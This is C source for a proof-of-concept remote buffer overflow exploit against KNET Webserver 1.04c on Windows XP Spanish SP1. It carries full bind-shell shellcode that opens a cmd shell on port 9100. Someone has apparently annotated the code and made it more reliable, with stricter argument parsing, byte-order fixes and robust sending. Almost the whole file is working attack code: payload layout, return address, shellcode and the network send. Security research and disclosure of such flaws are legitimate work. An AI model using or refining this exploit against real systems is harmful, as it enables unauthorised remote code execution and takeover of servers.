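/*
 * KNET Webserver (<= 1.04c) PoC exploit
 *
 * Tested on Windows XP Spanish SP1 with KNET 1.04c.
 * Spawns a remote cmd shell listening on TCP port 9100.
 *
 * Because the server keeps data such as the web directory and earlier
 * requests on the stack, the padding needed to align the return address
 * cannot be computed in advance: try pad values 0 through 3.
 * The shellcode itself uses no hard-coded addresses, but the address the
 * overflow returns into (RET_ADDR below) lives in a DLL, so this will most
 * likely not work on a Windows build other than XP Spanish SP1.
 *
 * By RaiSe
 *
 * http://www.enye-sec.org
 *
 * NOTE(review): offensive tooling -- use only against hosts you are
 * authorised to test. The headers below were reconstructed from the calls
 * the code makes (the originals were lost in extraction).
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Layout of the overflow request, in bytes. */
enum {
    NOP_SLED_LEN = 400,   /* NOP sled before the shellcode (plus 0-3 pad bytes) */
    RET_FILL_END = 1150,  /* return-address copies are written up to this offset */
    MAX_PAD      = 3,     /* upper bound of the alignment pad argument */
    BUF_SIZE     = 3072   /* payload and request buffers */
};

/*
 * Value the overwritten return pointer is set to. Points into a DLL of the
 * tested Windows XP Spanish SP1 build (see header). Written little-endian
 * below because the target is x86, regardless of the host's byte order.
 */
#define RET_ADDR 0x77222240UL

/*
 * Shellcode: binds a cmd shell on port 9100 (the bytes `\x23\x8c` appear to be
 * that port in network byte order). The ASCII table at the end names the APIs
 * it resolves (GetProcAddress, LoadLibraryA, ws2_32.dll, WSAStartup,
 * WSASocketA, bind, listen, accept, CreateProcessA, ExitProcess, cmd),
 * separated by 0x08; the separators are presumably turned into NULs at
 * run time. The payload builder measures this with strlen() and sends it
 * through a "%s" format, so it MUST stay free of NUL bytes.
 */
char shellcode[] = // cmd shell on 9100 port, by RaiSe
"\xeb\x08\x90\x90\x90\xeb\x08\x90\x90\x90\xe8\xf6\xff\xff\xff\x58\x66\x05\xaa"
"\x01\x8b\xd8\x24\xfc\x8d\x80\xac\xfd\xff\xff\x8b\xe8\x8d\x80\xac\xfe\xff\xff"
"\x8b\xe0\x89\x5d\x10\x32\xd2\x88\x53\x0e\x88\x53\x1b\x88\x53\x26\x88\x53\x31"
"\x88\x53\x3c\x88\x53\x41\x88\x53\x48\x88\x53\x4f\x88\x53\x5e\x88\x53\x6a\x88"
"\x53\x6e\x33\xd2\xb2\x30\x64\x8b\x1a\x8b\x5b\x0c\x8b\x5b\x0c\x8b\x1b\x8b\x1b"
"\x8b\x5b\x18\x89\x5d\x14\x8b\x7b\x3c\x03\xfb\x8b\x57\x78\x03\xd3\x8d\x4a\x1f"
"\x41\x8b\x01\x03\xc3\x33\xc9\x52\x8b\xd3\x50\x5b\x33\xc0\xfc\x8b\x3b\x03\xfa"
"\x8b\x75\x10\x33\xc9\xb1\x0e\xf3\xa6\x74\x0b\x90\x90\x90\x90\x83\xc3\x04\x40"
"\xeb\xe7\x90\x5a\x8b\xc8\x8b\x45\x14\x8b\x5a\x24\x03\xd8\x33\xff\x66\x8b\x3c"
"\x4b\x8b\x4a\x1c\x03\xc8\x8b\x34\xb9\x03\xf0\x89\x75\x18\x8b\x5d\x10\x8d\x5b"
"\x0f\x53\x8b\x4d\x14\x51\xff\xd6\x8d\x5b\x0c\x43\x53\xff\xd0\x89\x45\x1c\x8b"
"\xfb\x8b\xd0\x8d\x5d\x24\x33\xc9\xb1\x07\x51\x33\xc9\x49\x32\xc0\xf2\xae\x52"
"\x57\x52\x8b\x75\x18\xff\xd6\x5a\x89\x03\x43\x43\x43\x43\x59\x80\xf9\x03\x75"
"\x07\x90\x90\x90\x90\x8b\x55\x14\xe2\xda\x8d\x95\xfc\xfd\xff\xff\x52\x33\xd2"
"\x66\xba\x01\x01\x52\x8b\x5d\x24\xff\xd3\x33\xd2\x52\x52\x52\x52\x42\x52\x42"
"\x52\x8b\x5d\x28\xff\xd3\x89\x45\x40\x33\xd2\x52\x66\xba\x23\x8c\x66\x52\x66"
"\x33\xd2\xb2\x02\x66\x52\x8b\xdc\xb2\x16\x52\x53\x50\x8b\x75\x2c\xff\xd6\x33"
"\xd2\xb2\x05\x52\x8b\x55\x40\x52\x8b\x75\x30\xff\xd6\x33\xd2\xb2\x16\x52\x54"
"\x8d\x55\xb0\x52\x8b\x55\x40\x52\x8b\x75\x34\xff\xd6\x8b\xf0\x33\xc9\x66\xb9"
"\x21\x01\x66\x49\x8d\xbd\xb0\xfe\xff\xff\x33\xc0\xf3\xaa\x8d\xbd\xb0\xfe\xff"
"\xff\xc6\x07\x44\x89\x77\x38\x89\x77\x3c\x89\x77\x40\x66\xc7\x47\x2c\x01\x01"
"\x8d\x95\xb0\xfe\xff\xff\x8d\x52\xac\x52\x57\x33\xd2\x52\x52\x52\x42\x52\x4a"
"\x52\x52\x8b\x7d\x10\x8d\x7f\x6b\x57\x52\x8b\x75\x38\xff\xd6\x33\xd2\x52\x8b"
"\x75\x3c\xff\xd6\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x08"
"\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x08\x77\x73\x32\x5f\x33\x32"
"\x2e\x64\x6c\x6c\x08\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x08\x57\x53\x41"
"\x53\x6f\x63\x6b\x65\x74\x41\x08\x62\x69\x6e\x64\x08\x6c\x69\x73\x74\x65\x6e"
"\x08\x61\x63\x63\x65\x70\x74\x08\x43\x72\x65\x61\x74\x65\x50\x72\x6f\x63\x65"
"\x73\x73\x41\x08\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x08\x63\x6d\x64"
"\x08";

/*
 * Stub appended after the return-address block: 8 NOPs followed by 14 bytes
 * kept byte-for-byte from the original PoC. Its disassembly suggests it
 * builds an address on the stack and `ret`s into it -- treat as opaque.
 */
static const unsigned char tail_stub[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x66, 0x33, 0xc0, 0xb0, 0xa0, 0x66, 0x50, 0x66,
    0xb8, 0xd1, 0xfa, 0x66, 0x50, 0xc3
};

/* Print the usage text (unchanged from the original) and exit. */
static void usage(const char *prog)
{
    fprintf(stderr, "\nUso: %s ip_destino puerto [pad]\npad: 0-3\n"
            "\nEjemplo: %s 1.1.1.1 80 2\n", prog, prog);
    exit(-1);
}

/*
 * Strict decimal parse of `s` into *out. Returns 0 on success, -1 if the
 * string is empty, has trailing garbage, or overflows. Replaces atoi(),
 * which silently yields 0 for any of those.
 */
static int parse_int(const char *s, long *out)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE)
        return -1;
    *out = v;
    return 0;
}

/*
 * Build the overflow body into buf (capacity BUF_SIZE), NUL-terminated.
 * Layout: (NOP_SLED_LEN + pad) NOPs | shellcode | RET_ADDR repeated in
 * 4-byte little-endian copies up to offset RET_FILL_END | tail_stub.
 * Returns the payload length, or 0 if it would not fit.
 *
 * Why not the original `unsigned long *` store loop: on LP64 hosts an
 * unsigned long is 8 bytes, so each store wrote RET_ADDR plus four zero
 * bytes while the loop only advanced 4 -- the first NUL then truncated the
 * request at strlen(). memcpy of explicit bytes also avoids the misaligned
 * pointer store and fixes the byte order to the x86 target.
 */
static size_t build_payload(unsigned char *buf, int pad)
{
    const unsigned char ret_le[4] = {
        (unsigned char)(RET_ADDR & 0xff),
        (unsigned char)((RET_ADDR >> 8) & 0xff),
        (unsigned char)((RET_ADDR >> 16) & 0xff),
        (unsigned char)((RET_ADDR >> 24) & 0xff)
    };
    size_t sc_len = strlen(shellcode);
    size_t off = (size_t)NOP_SLED_LEN + (size_t)pad;

    /* Worst case: sled + shellcode + fill rounded up + stub + NUL. */
    if (off + sc_len + RET_FILL_END + sizeof ret_le + sizeof tail_stub + 1 > BUF_SIZE)
        return 0;

    memset(buf, 0, BUF_SIZE);
    memset(buf, 0x90, off);
    memcpy(buf + off, shellcode, sc_len);
    off += sc_len;

    /* Same stride as the original loop: 4 bytes per copy until RET_FILL_END. */
    while (off < RET_FILL_END) {
        memcpy(buf + off, ret_le, sizeof ret_le);
        off += sizeof ret_le;
    }

    memcpy(buf + off, tail_stub, sizeof tail_stub);
    off += sizeof tail_stub;
    buf[off] = '\0';
    return off;
}

/* Write all of buf[0..len) to fd, retrying on short writes. 0 ok, -1 error. */
static int send_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t w = write(fd, buf, len);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += w;
        len -= (size_t)w;
    }
    return 0;
}

/*
 * Usage: prog ip_destino puerto [pad]
 *   ip_destino  target IPv4 address (dotted quad)
 *   puerto      target TCP port, 1-65535
 *   pad         alignment pad, 0-3 (default 0; try each until it works)
 * Connects, sends one "GET <payload> \r\n\r\n" request and exits.
 * Exits with -1 on bad arguments or any socket error, 0 after sending.
 */
int main(int argc, char *argv[])
{
    long port, pad = 0;
    int soc;
    struct sockaddr_in dire;
    unsigned char buf[BUF_SIZE];
    char req[BUF_SIZE];
    int n;

    if (argc < 3)
        usage(argv[0]);

    /* atoi() accepted "80abc" and out-of-range values; be strict here. */
    if (parse_int(argv[2], &port) != 0 || port < 1 || port > 65535) {
        fprintf(stderr, "Puerto invalido: %s\n", argv[2]);
        exit(-1);
    }

    if (argc >= 4 && (parse_int(argv[3], &pad) != 0 || pad < 0 || pad > MAX_PAD))
        usage(argv[0]);

    memset(&dire, 0, sizeof dire);
    dire.sin_family = AF_INET;
    dire.sin_port = htons((uint16_t)port);
    dire.sin_addr.s_addr = inet_addr(argv[1]);
    /* inet_addr() reports a bad dotted quad as INADDR_NONE; the original
     * would have happily connected to 255.255.255.255. */
    if (dire.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "Direccion IP invalida: %s\n", argv[1]);
        exit(-1);
    }

    if ((soc = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        fprintf(stderr, "Error al crear el socket.\n");
        exit(-1);
    }

    if (connect(soc, (struct sockaddr *)&dire, sizeof dire) == -1) {
        fprintf(stderr, "Error al conectar el socket.\n");
        close(soc);
        exit(-1);
    }

    if (build_payload(buf, (int)pad) == 0) {
        fprintf(stderr, "Error al construir el payload.\n");
        close(soc);
        exit(-1);
    }

    /* Same request shape as the original: "GET <payload> \r\n\r\n". */
    n = snprintf(req, sizeof req, "GET %s \r\n\r\n", (const char *)buf);
    if (n < 0 || (size_t)n >= sizeof req) {
        fprintf(stderr, "Error al construir la peticion.\n");
        close(soc);
        exit(-1);
    }

    /* The original ignored write()'s result; a short or failed send would
     * have looked like a successful attempt. */
    if (send_all(soc, req, (size_t)n) != 0) {
        fprintf(stderr, "Error al enviar la peticion.\n");
        close(soc);
        exit(-1);
    }

    close(soc);
    exit(0);
}   /********** end of main () ***********/

/* EOF */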